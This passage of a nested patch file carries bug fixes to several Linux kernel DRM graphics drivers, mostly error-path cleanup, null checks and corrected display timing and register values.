+@@ -1854,6 +1854,9 @@ bool dcn10_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ {
+ 	struct dpp *dpp = pipe_ctx->plane_res.dpp;
+ 
++	if (!stream)
++		return false;
++
+ 	if (dpp == NULL)
+ 		return false;
+ 
+@@ -1876,8 +1879,8 @@ bool dcn10_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	} else
+ 		dpp->funcs->dpp_program_regamma_pwl(dpp, NULL, OPP_REGAMMA_BYPASS);
+ 
+-	if (stream != NULL && stream->ctx != NULL &&
+-			stream->out_transfer_func != NULL) {
++	if (stream->ctx &&
++	    stream->out_transfer_func) {
+ 		log_tf(stream->ctx,
+ 				stream->out_transfer_func,
+ 				dpp->regamma_params.hw_points_num);
+diff --git a/drivers/gpu/drm/lima/lima_gem.c b/drivers/gpu/drm/lima/lima_gem.c
+index 0f1ca0b0db495..d72c5bf4e5ac1 100644
+--- a/drivers/gpu/drm/lima/lima_gem.c
++++ b/drivers/gpu/drm/lima/lima_gem.c
+@@ -75,29 +75,34 @@ int lima_heap_alloc(struct lima_bo *bo, struct lima_vm *vm)
+ 	} else {
+ 		bo->base.sgt = kmalloc(sizeof(*bo->base.sgt), GFP_KERNEL);
+ 		if (!bo->base.sgt) {
+-			sg_free_table(&sgt);
+-			return -ENOMEM;
++			ret = -ENOMEM;
++			goto err_out0;
+ 		}
+ 	}
+ 
+ 	ret = dma_map_sgtable(dev, &sgt, DMA_BIDIRECTIONAL, 0);
+-	if (ret) {
+-		sg_free_table(&sgt);
+-		kfree(bo->base.sgt);
+-		bo->base.sgt = NULL;
+-		return ret;
+-	}
++	if (ret)
++		goto err_out1;
+ 
+ 	*bo->base.sgt = sgt;
+ 
+ 	if (vm) {
+ 		ret = lima_vm_map_bo(vm, bo, old_size >> PAGE_SHIFT);
+ 		if (ret)
+-			return ret;
++			goto err_out2;
+ 	}
+ 
+ 	bo->heap_size = new_size;
+ 	return 0;
++
++err_out2:
++	dma_unmap_sgtable(dev, &sgt, DMA_BIDIRECTIONAL, 0);
++err_out1:
++	kfree(bo->base.sgt);
++	bo->base.sgt = NULL;
++err_out0:
++	sg_free_table(&sgt);
++	return ret;
+ }
+ 
+ int lima_gem_create_handle(struct drm_device *dev, struct drm_file *file,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 558000db4a100..beaaf44004cfd 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -91,11 +91,13 @@ static void mtk_drm_crtc_finish_page_flip(struct mtk_drm_crtc *mtk_crtc)
+ 	struct drm_crtc *crtc = &mtk_crtc->base;
+ 	unsigned long flags;
+ 
+-	spin_lock_irqsave(&crtc->dev->event_lock, flags);
+-	drm_crtc_send_vblank_event(crtc, mtk_crtc->event);
+-	drm_crtc_vblank_put(crtc);
+-	mtk_crtc->event = NULL;
+-	spin_unlock_irqrestore(&crtc->dev->event_lock, flags);
++	if (mtk_crtc->event) {
++		spin_lock_irqsave(&crtc->dev->event_lock, flags);
++		drm_crtc_send_vblank_event(crtc, mtk_crtc->event);
++		drm_crtc_vblank_put(crtc);
++		mtk_crtc->event = NULL;
++		spin_unlock_irqrestore(&crtc->dev->event_lock, flags);
++	}
+ }
+ 
+ static void mtk_drm_finish_page_flip(struct mtk_drm_crtc *mtk_crtc)
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 3e74c7c1b89fa..d871b1dba083d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -70,8 +70,8 @@
+ #define DSI_PS_WC			0x3fff
+ #define DSI_PS_SEL			(3 << 16)
+ #define PACKED_PS_16BIT_RGB565		(0 << 16)
+-#define LOOSELY_PS_18BIT_RGB666		(1 << 16)
+-#define PACKED_PS_18BIT_RGB666		(2 << 16)
++#define PACKED_PS_18BIT_RGB666		(1 << 16)
++#define LOOSELY_PS_24BIT_RGB666		(2 << 16)
+ #define PACKED_PS_24BIT_RGB888		(3 << 16)
+ 
+ #define DSI_VSA_NL		0x20
+@@ -366,10 +366,10 @@ static void mtk_dsi_ps_control_vact(struct mtk_dsi *dsi)
+ 		ps_bpp_mode |= PACKED_PS_24BIT_RGB888;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+-		ps_bpp_mode |= PACKED_PS_18BIT_RGB666;
++		ps_bpp_mode |= LOOSELY_PS_24BIT_RGB666;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+-		ps_bpp_mode |= LOOSELY_PS_18BIT_RGB666;
++		ps_bpp_mode |= PACKED_PS_18BIT_RGB666;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB565:
+ 		ps_bpp_mode |= PACKED_PS_16BIT_RGB565;
+@@ -423,7 +423,7 @@ static void mtk_dsi_ps_control(struct mtk_dsi *dsi)
+ 		dsi_tmp_buf_bpp = 3;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+-		tmp_reg = LOOSELY_PS_18BIT_RGB666;
++		tmp_reg = LOOSELY_PS_24BIT_RGB666;
+ 		dsi_tmp_buf_bpp = 3;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 25245ef386db6..3632f0768aa9e 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -228,6 +228,13 @@ bool dpu_encoder_is_widebus_enabled(const struct drm_encoder *drm_enc)
+ 	return dpu_enc->wide_bus_en;
+ }
+ 
++bool dpu_encoder_is_dsc_enabled(const struct drm_encoder *drm_enc)
++{
++	const struct dpu_encoder_virt *dpu_enc = to_dpu_encoder_virt(drm_enc);
++
++	return dpu_enc->dsc ? true : false;
++}
++
+ int dpu_encoder_get_crc_values_cnt(const struct drm_encoder *drm_enc)
+ {
+ 	struct dpu_encoder_virt *dpu_enc;
+@@ -1864,7 +1871,9 @@ static void dpu_encoder_prep_dsc(struct dpu_encoder_virt *dpu_enc,
+ 	dsc_common_mode = 0;
+ 	pic_width = dsc->pic_width;
+ 
+-	dsc_common_mode = DSC_MODE_MULTIPLEX | DSC_MODE_SPLIT_PANEL;
++	dsc_common_mode = DSC_MODE_SPLIT_PANEL;
++	if (dpu_encoder_use_dsc_merge(enc_master->parent))
++		dsc_common_mode |= DSC_MODE_MULTIPLEX;
+ 	if (enc_master->intf_mode == INTF_MODE_VIDEO)
+ 		dsc_common_mode |= DSC_MODE_VIDEO;
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h
+index 9e7236ef34e6d..a71efa2b9e508 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h
+@@ -175,6 +175,13 @@ int dpu_encoder_get_vsync_count(struct drm_encoder *drm_enc);
+ 
+ bool dpu_encoder_is_widebus_enabled(const struct drm_encoder *drm_enc);
+ 
++/**
++ * dpu_encoder_is_dsc_enabled - indicate whether dsc is enabled
++ *				for the encoder.
++ * @drm_enc:    Pointer to previously created drm encoder structure
++ */
++bool dpu_encoder_is_dsc_enabled(const struct drm_encoder *drm_enc);
++
+ /**
+  * dpu_encoder_get_crc_values_cnt - get number of physical encoders contained
+  *	in virtual encoder that can collect CRC values
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c
+index 2c14646661b77..2baade1cd4876 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c
+@@ -100,6 +100,7 @@ static void drm_mode_to_intf_timing_params(
+ 	}
+ 
+ 	timing->wide_bus_en = dpu_encoder_is_widebus_enabled(phys_enc->parent);
++	timing->compression_en = dpu_encoder_is_dsc_enabled(phys_enc->parent);
+ 
+ 	/*
+ 	 * for DP, divide the horizonal parameters by 2 when
+@@ -256,12 +257,14 @@ static void dpu_encoder_phys_vid_setup_timing_engine(
+ 		mode.htotal >>= 1;
+ 		mode.hsync_start >>= 1;
+ 		mode.hsync_end >>= 1;
++		mode.hskew >>= 1;
+ 
+ 		DPU_DEBUG_VIDENC(phys_enc,
+-			"split_role %d, halve horizontal %d %d %d %d\n",
++			"split_role %d, halve horizontal %d %d %d %d %d\n",
+ 			phys_enc->split_role,
+ 			mode.hdisplay, mode.htotal,
+-			mode.hsync_start, mode.hsync_end);
++			mode.hsync_start, mode.hsync_end,
++			mode.hskew);
+ 	}
+ 
+ 	drm_mode_to_intf_timing_params(phys_enc, &mode, &timing_params);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index 384558d2f9602..1debac4fcc3eb 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -154,13 +154,8 @@ static void dpu_hw_intf_setup_timing_engine(struct dpu_hw_intf *ctx,
+ 	hsync_ctl = (hsync_period << 16) | p->hsync_pulse_width;
+ 	display_hctl = (hsync_end_x << 16) | hsync_start_x;
+ 
+-	/*
+-	 * DATA_HCTL_EN controls data timing which can be different from
+-	 * video timing. It is recommended to enable it for all cases, except
+-	 * if compression is enabled in 1 pixel per clock mode
+-	 */
+ 	if (p->wide_bus_en)
+-		intf_cfg2 |= INTF_CFG2_DATABUS_WIDEN | INTF_CFG2_DATA_HCTL_EN;
++		intf_cfg2 |= INTF_CFG2_DATABUS_WIDEN;
+ 
+ 	data_width = p->width;
+ 
+@@ -230,6 +225,14 @@ static void dpu_hw_intf_setup_timing_engine(struct dpu_hw_intf *ctx,
+ 	DPU_REG_WRITE(c, INTF_CONFIG, intf_cfg);
+ 	DPU_REG_WRITE(c, INTF_PANEL_FORMAT, panel_format);
+ 	if (ctx->cap->features & BIT(DPU_DATA_HCTL_EN)) {
++		/*
++		 * DATA_HCTL_EN controls data timing which can be different from
++		 * video timing. It is recommended to enable it for all cases, except
++		 * if compression is enabled in 1 pixel per clock mode
++		 */
++		if (!(p->compression_en && !p->wide_bus_en))
++			intf_cfg2 |= INTF_CFG2_DATA_HCTL_EN;
++
+ 		DPU_REG_WRITE(c, INTF_CONFIG2, intf_cfg2);
+ 		DPU_REG_WRITE(c, INTF_DISPLAY_DATA_HCTL, display_data_hctl);
+ 		DPU_REG_WRITE(c, INTF_ACTIVE_DATA_HCTL, active_data_hctl);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+index e75339b96a1d2..7f502c8bee1d4 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+@@ -33,6 +33,7 @@ struct intf_timing_params {
+ 	u32 hsync_skew;
+ 
+ 	bool wide_bus_en;
++	bool compression_en;
+ };
+ 
+ struct intf_prog_fetch {
+diff --git a/drivers/gpu/drm/nouveau/nouveau_bo.c b/drivers/gpu/drm/nouveau/nouveau_bo.c
+index 126b3c6e12f99..f2dca41e46c5f 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_bo.c
++++ b/drivers/gpu/drm/nouveau/nouveau_bo.c
+@@ -1194,6 +1194,8 @@ nouveau_ttm_io_mem_reserve(struct ttm_device *bdev, struct ttm_resource *reg)
+ 			drm_vma_node_unmap(&nvbo->bo.base.vma_node,
+ 					   bdev->dev_mapping);
+ 			nouveau_ttm_io_mem_free_locked(drm, nvbo->bo.resource);
++			nvbo->bo.resource->bus.offset = 0;
++			nvbo->bo.resource->bus.addr = NULL;
+ 			goto retry;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index 42584d8a9aeb6..bfcddd4aa9322 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -413,8 +413,7 @@ static int panel_edp_unprepare(struct drm_panel *panel)
+ 	if (!p->prepared)
+ 		return 0;
+ 
+-	pm_runtime_mark_last_busy(panel->dev);
+-	ret = pm_runtime_put_autosuspend(panel->dev);
++	ret = pm_runtime_put_sync_suspend(panel->dev);
+ 	if (ret < 0)
+ 		return ret;
+ 	p->prepared = false;
+diff --git a/drivers/gpu/drm/radeon/ni.c b/drivers/gpu/drm/radeon/ni.c
+index 927e5f42e97d0..3e48cbb522a1c 100644
+--- a/drivers/gpu/drm/radeon/ni.c
++++ b/drivers/gpu/drm/radeon/ni.c
+@@ -813,7 +813,7 @@ int ni_init_microcode(struct radeon_device *rdev)
+ 			err = 0;
+ 		} else if (rdev->smc_fw->size != smc_req_size) {
+ 			pr_err("ni_mc: Bogus length %zu in firmware \"%s\"\n",
+-			       rdev->mc_fw->size, fw_name);
++			       rdev->smc_fw->size, fw_name);
+ 			err = -EINVAL;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/rockchip/inno_hdmi.c b/drivers/gpu/drm/rockchip/inno_hdmi.c
+index f51774866f412..8f230f4c01bc3 100644
+--- a/drivers/gpu/drm/rockchip/inno_hdmi.c
++++ b/drivers/gpu/drm/rockchip/inno_hdmi.c
+@@ -411,7 +411,7 @@ static int inno_hdmi_config_video_timing(struct inno_hdmi *hdmi,
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HBLANK_L, value & 0xFF);
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HBLANK_H, (value >> 8) & 0xFF);
+ 
+-	value = mode->hsync_start - mode->hdisplay;
++	value = mode->htotal - mode->hsync_start;
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HDELAY_L, value & 0xFF);
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HDELAY_H, (value >> 8) & 0xFF);
+ 
+@@ -426,7 +426,7 @@ static int inno_hdmi_config_video_timing(struct inno_hdmi *hdmi,
+ 	value = mode->vtotal - mode->vdisplay;
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_VBLANK, value & 0xFF);
+ 
+-	value = mode->vsync_start - mode->vdisplay;
++	value = mode->vtotal - mode->vsync_start;
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_VDELAY, value & 0xFF);
+ 
+ 	value = mode->vsync_end - mode->vsync_start;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_lvds.c b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+index 68f6ebb33460b..eb4a108c5bd2a 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_lvds.c
++++ b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+@@ -577,8 +577,7 @@ static int rockchip_lvds_bind(struct device *dev, struct device *master,
+ 		ret = -EINVAL;
+ 		goto err_put_port;
+ 	} else if (ret) {
+-		DRM_DEV_ERROR(dev, "failed to find panel and bridge node\n");
+-		ret = -EPROBE_DEFER;
++		dev_err_probe(dev, ret, "failed to find panel and bridge node\n");
+ 		goto err_put_port;
+ 	}
+ 	if (lvds->panel)
+diff --git a/drivers/gpu/drm/tegra/dpaux.c b/drivers/gpu/drm/tegra/dpaux.c
+index d773ef4854188..b563988fb6848 100644
+--- a/drivers/gpu/drm/tegra/dpaux.c
++++ b/drivers/gpu/drm/tegra/dpaux.c
+@@ -524,7 +524,7 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	if (err < 0) {
+ 		dev_err(dpaux->dev, "failed to request IRQ#%u: %d\n",
+ 			dpaux->irq, err);
+-		return err;
++		goto err_pm_disable;
+ 	}
+ 
+ 	disable_irq(dpaux->irq);
+@@ -544,7 +544,7 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	 */
+ 	err = tegra_dpaux_pad_config(dpaux, DPAUX_PADCTL_FUNC_I2C);
+ 	if (err < 0)
+-		return err;
++		goto err_pm_disable;
+ 
+ #ifdef CONFIG_GENERIC_PINCONF
+ 	dpaux->desc.name = dev_name(&pdev->dev);
+@@ -557,7 +557,8 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	dpaux->pinctrl = devm_pinctrl_register(&pdev->dev, &dpaux->desc, dpaux);
+ 	if (IS_ERR(dpaux->pinctrl)) {
+ 		dev_err(&pdev->dev, "failed to register pincontrol\n");
+-		return PTR_ERR(dpaux->pinctrl);
++		err = PTR_ERR(dpaux->pinctrl);
++		goto err_pm_disable;
+ 	}
+ #endif
+ 	/* enable and clear all interrupts */
+@@ -573,10 +574,15 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	err = devm_of_dp_aux_populate_ep_devices(&dpaux->aux);
+ 	if (err < 0) {
+ 		dev_err(dpaux->dev, "failed to populate AUX bus: %d\n", err);
+-		return err;
++		goto err_pm_disable;
+ 	}
+ 
+ 	return 0;
++
++err_pm_disable:
++	pm_runtime_put_sync(&pdev->dev);
++	pm_runtime_disable(&pdev->dev);
++	return err;
+ }
+ 
+ static int tegra_dpaux_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/tegra/dsi.c b/drivers/gpu/drm/tegra/dsi.c
+index de1333dc0d867..7bb26655cb3cc 100644
+--- a/drivers/gpu/drm/tegra/dsi.c
++++ b/drivers/gpu/drm/tegra/dsi.c
+@@ -1534,9 +1534,11 @@ static int tegra_dsi_ganged_probe(struct tegra_dsi *dsi)
+ 	np = of_parse_phandle(dsi->dev->of_node, "nvidia,ganged-mode", 0);
+ 	if (np) {
+ 		struct platform_device *gangster = of_find_device_by_node(np);
++		of_node_put(np);
++		if (!gangster)
++			return -EPROBE_DEFER;
+ 
+ 		dsi->slave = platform_get_drvdata(gangster);
+-		of_node_put(np);
+ 
+ 		if (!dsi->slave) {
+ 			put_device(&gangster->dev);
+@@ -1584,48 +1586,58 @@ static int tegra_dsi_probe(struct platform_device *pdev)
+ 
+ 	if (!pdev->dev.pm_domain) {
+ 		dsi->rst = devm_reset_control_get(&pdev->dev, "dsi");
+-		if (IS_ERR(dsi->rst))
+-			return PTR_ERR(dsi->rst);
++		if (IS_ERR(dsi->rst)) {
++			err = PTR_ERR(dsi->rst);
++			goto remove;
++		}
+ 	}
+ 
+ 	dsi->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (IS_ERR(dsi->clk)) {
+-		dev_err(&pdev->dev, "cannot get DSI clock\n");
+-		return PTR_ERR(dsi->clk);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->clk),
++				    "cannot get DSI clock\n");
++		goto remove;
+ 	}
+ 
+ 	dsi->clk_lp = devm_clk_get(&pdev->dev, "lp");
+ 	if (IS_ERR(dsi->clk_lp)) {
+-		dev_err(&pdev->dev, "cannot get low-power clock\n");
+-		return PTR_ERR(dsi->clk_lp);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->clk_lp),
++				    "cannot get low-power clock\n");
++		goto remove;
+ 	}
+ 
+ 	dsi->clk_parent = devm_clk_get(&pdev->dev, "parent");
+ 	if (IS_ERR(dsi->clk_parent)) {
+-		dev_err(&pdev->dev, "cannot get parent clock\n");
+-		return PTR_ERR(dsi->clk_parent);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->clk_parent),
++				    "cannot get parent clock\n");
++		goto remove;
+ 	}
+ 
+ 	dsi->vdd = devm_regulator_get(&pdev->dev, "avdd-dsi-csi");
+ 	if (IS_ERR(dsi->vdd)) {
+-		dev_err(&pdev->dev, "cannot get VDD supply\n");
+-		return PTR_ERR(dsi->vdd);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->vdd),
++				    "cannot get VDD supply\n");
++		goto remove;
+ 	}
+ 
+ 	err = tegra_dsi_setup_clocks(dsi);
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev, "cannot setup clocks\n");
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	regs = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+ 	dsi->regs = devm_ioremap_resource(&pdev->dev, regs);
+-	if (IS_ERR(dsi->regs))
+-		return PTR_ERR(dsi->regs);
++	if (IS_ERR(dsi->regs)) {
++		err = PTR_ERR(dsi->regs);
++		goto remove;
++	}
+ 
+ 	dsi->mipi = tegra_mipi_request(&pdev->dev, pdev->dev.of_node);
+-	if (IS_ERR(dsi->mipi))
+-		return PTR_ERR(dsi->mipi);
++	if (IS_ERR(dsi->mipi)) {
++		err = PTR_ERR(dsi->mipi);
++		goto remove;
++	}
+ 
+ 	dsi->host.ops = &tegra_dsi_host_ops;
+ 	dsi->host.dev = &pdev->dev;
+@@ -1653,9 +1665,12 @@ static int tegra_dsi_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ unregister:
++	pm_runtime_disable(&pdev->dev);
+ 	mipi_dsi_host_unregister(&dsi->host);
+ mipi_free:
+ 	tegra_mipi_free(dsi->mipi);
++remove:
++	tegra_output_remove(&dsi->output);
+ 	return err;
+ }
+ 
+diff --git a/drivers/gpu/drm/tegra/fb.c b/drivers/gpu/drm/tegra/fb.c
+index 9291209154a7a..a688ecf08451e 100644
+--- a/drivers/gpu/drm/tegra/fb.c
++++ b/drivers/gpu/drm/tegra/fb.c
+@@ -166,6 +166,7 @@ struct drm_framebuffer *tegra_fb_create(struct drm_device *drm,
+ 
+ 		if (gem->size < size) {
+ 			err = -EINVAL;
++			drm_gem_object_put(gem);
+ 			goto unreference;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/tegra/hdmi.c b/drivers/gpu/drm/tegra/hdmi.c
+index bf240767dad9f..c66764c0bd250 100644
+--- a/drivers/gpu/drm/tegra/hdmi.c
++++ b/drivers/gpu/drm/tegra/hdmi.c
+@@ -1776,7 +1776,6 @@ static irqreturn_t tegra_hdmi_irq(int irq, void *data)
+ static int tegra_hdmi_probe(struct platform_device *pdev)
+ {
+ 	struct tegra_hdmi *hdmi;
+-	struct resource *regs;
+ 	int err;
+ 
+ 	hdmi = devm_kzalloc(&pdev->dev, sizeof(*hdmi), GFP_KERNEL);
+@@ -1838,14 +1837,15 @@ static int tegra_hdmi_probe(struct platform_device *pdev)
+ 	if (err < 0)
+ 		return err;
+ 
+-	regs = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	hdmi->regs = devm_ioremap_resource(&pdev->dev, regs);
+-	if (IS_ERR(hdmi->regs))
+-		return PTR_ERR(hdmi->regs);
++	hdmi->regs = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(hdmi->regs)) {
++		err = PTR_ERR(hdmi->regs);
++		goto remove;
++	}
+ 
+ 	err = platform_get_irq(pdev, 0);
+ 	if (err < 0)
+-		return err;
++		goto remove;
+ 
+ 	hdmi->irq = err;
+ 
+@@ -1854,18 +1854,18 @@ static int tegra_hdmi_probe(struct platform_device *pdev)
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev, "failed to request IRQ#%u: %d\n",
+ 			hdmi->irq, err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	platform_set_drvdata(pdev, hdmi);
+ 
+ 	err = devm_pm_runtime_enable(&pdev->dev);
+ 	if (err)
+-		return err;
++		goto remove;
+ 
+ 	err = devm_tegra_core_dev_init_opp_table_common(&pdev->dev);
+ 	if (err)
+-		return err;
++		goto remove;
+ 
+ 	INIT_LIST_HEAD(&hdmi->client.list);
+ 	hdmi->client.ops = &hdmi_client_ops;
+@@ -1875,10 +1875,14 @@ static int tegra_hdmi_probe(struct platform_device *pdev)
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev, "failed to register host1x client: %d\n",
+ 			err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	return 0;
++
++remove:
++	tegra_output_remove(&hdmi->output);
++	return err;
+ }
+ 
+ static int tegra_hdmi_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/tegra/output.c b/drivers/gpu/drm/tegra/output.c
+index 47d26b5d99456..7ccd010a821b7 100644
+--- a/drivers/gpu/drm/tegra/output.c
++++ b/drivers/gpu/drm/tegra/output.c
+@@ -139,8 +139,10 @@ int tegra_output_probe(struct tegra_output *output)
+ 						       GPIOD_IN,
+ 						       "HDMI hotplug detect");
+ 	if (IS_ERR(output->hpd_gpio)) {
+-		if (PTR_ERR(output->hpd_gpio) != -ENOENT)
+-			return PTR_ERR(output->hpd_gpio);
++		if (PTR_ERR(output->hpd_gpio) != -ENOENT) {
++			err = PTR_ERR(output->hpd_gpio);
++			goto put_i2c;
++		}
+ 
+ 		output->hpd_gpio = NULL;
+ 	}
+@@ -149,7 +151,7 @@ int tegra_output_probe(struct tegra_output *output)
+ 		err = gpiod_to_irq(output->hpd_gpio);
+ 		if (err < 0) {
+ 			dev_err(output->dev, "gpiod_to_irq(): %d\n", err);
+-			return err;
++			goto put_i2c;
+ 		}
+ 
+ 		output->hpd_irq = err;
+@@ -162,7 +164,7 @@ int tegra_output_probe(struct tegra_output *output)
+ 		if (err < 0) {
+ 			dev_err(output->dev, "failed to request IRQ#%u: %d\n",
+ 				output->hpd_irq, err);
+-			return err;
++			goto put_i2c;
+ 		}
+ 
+ 		output->connector.polled = DRM_CONNECTOR_POLL_HPD;
+@@ -176,6 +178,12 @@ int tegra_output_probe(struct tegra_output *output)
+ 	}
+ 
+ 	return 0;
++
++put_i2c:
++	if (output->ddc)
++		i2c_put_adapter(output->ddc);
++
++	return err;
+ }
+ 
+ void tegra_output_remove(struct tegra_output *output)
+diff --git a/drivers/gpu/drm/tegra/rgb.c b/drivers/gpu/drm/tegra/rgb.c
+index ff8fce36d2aa1..86e55e5d12b39 100644
+--- a/drivers/gpu/drm/tegra/rgb.c
++++ b/drivers/gpu/drm/tegra/rgb.c
+@@ -214,26 +214,28 @@ int tegra_dc_rgb_probe(struct tegra_dc *dc)
+ 	rgb->clk = devm_clk_get(dc->dev, NULL);
+ 	if (IS_ERR(rgb->clk)) {
+ 		dev_err(dc->dev, "failed to get clock\n");
+-		return PTR_ERR(rgb->clk);
++		err = PTR_ERR(rgb->clk);
++		goto remove;
+ 	}
+ 
+ 	rgb->clk_parent = devm_clk_get(dc->dev, "parent");
+ 	if (IS_ERR(rgb->clk_parent)) {
+ 		dev_err(dc->dev, "failed to get parent clock\n");
+-		return PTR_ERR(rgb->clk_parent);
++		err = PTR_ERR(rgb->clk_parent);
++		goto remove;
+ 	}
+ 
+ 	err = clk_set_parent(rgb->clk, rgb->clk_parent);
+ 	if (err < 0) {
+ 		dev_err(dc->dev, "failed to set parent clock: %d\n", err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	rgb->pll_d_out0 = clk_get_sys(NULL, "pll_d_out0");
+ 	if (IS_ERR(rgb->pll_d_out0)) {
+ 		err = PTR_ERR(rgb->pll_d_out0);
+ 		dev_err(dc->dev, "failed to get pll_d_out0: %d\n", err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	if (dc->soc->has_pll_d2_out0) {
+@@ -241,13 +243,19 @@ int tegra_dc_rgb_probe(struct tegra_dc *dc)
+ 		if (IS_ERR(rgb->pll_d2_out0)) {
+ 			err = PTR_ERR(rgb->pll_d2_out0);
+ 			dev_err(dc->dev, "failed to get pll_d2_out0: %d\n", err);
+-			return err;
++			goto put_pll;
+ 		}
+ 	}
+ 
+ 	dc->rgb = &rgb->output;
+ 
+ 	return 0;
++
++put_pll:
++	clk_put(rgb->pll_d_out0);
++remove:
++	tegra_output_remove(&rgb->output);
++	return err;
+ }
+ 
+ int tegra_dc_rgb_remove(struct tegra_dc *dc)
+diff --git a/drivers/gpu/drm/tidss/tidss_crtc.c b/drivers/gpu/drm/tidss/tidss_crtc.c
+index cb66a425dd200..896a77853ebc5 100644
+--- a/drivers/gpu/drm/tidss/tidss_crtc.c
++++ b/drivers/gpu/drm/tidss/tidss_crtc.c
+@@ -270,6 +270,16 @@ static void tidss_crtc_atomic_disable(struct drm_crtc *crtc,
+ 
+ 	reinit_completion(&tcrtc->framedone_completion);
+ 
++	/*
++	 * If a layer is left enabled when the videoport is disabled, and the
++	 * vid pipeline that was used for the layer is taken into use on
++	 * another videoport, the DSS will report sync lost issues. Disable all
++	 * the layers here as a work-around.
++	 */
++	for (u32 layer = 0; layer < tidss->feat->num_planes; layer++)
++		dispc_ovr_enable_layer(tidss->dispc, tcrtc->hw_videoport, layer,
++				       false);
++
+ 	dispc_vp_disable(tidss->dispc, tcrtc->hw_videoport);
+ 
+ 	if (!wait_for_completion_timeout(&tcrtc->framedone_completion,
+diff --git a/drivers/gpu/drm/tidss/tidss_plane.c b/drivers/gpu/drm/tidss/tidss_plane.c
+index 42d50ec5526d7..435b3b66ae632 100644
+--- a/drivers/gpu/drm/tidss/tidss_plane.c
++++ b/drivers/gpu/drm/tidss/tidss_plane.c
+@@ -211,7 +211,7 @@ struct tidss_plane *tidss_plane_create(struct tidss_device *tidss,
+ 
+ 	drm_plane_helper_add(&tplane->plane, &tidss_plane_helper_funcs);
+ 
+-	drm_plane_create_zpos_property(&tplane->plane, hw_plane_id, 0,
++	drm_plane_create_zpos_property(&tplane->plane, tidss->num_planes, 0,
+ 				       num_planes - 1);
+ 
+ 	ret = drm_plane_create_color_properties(&tplane->plane,
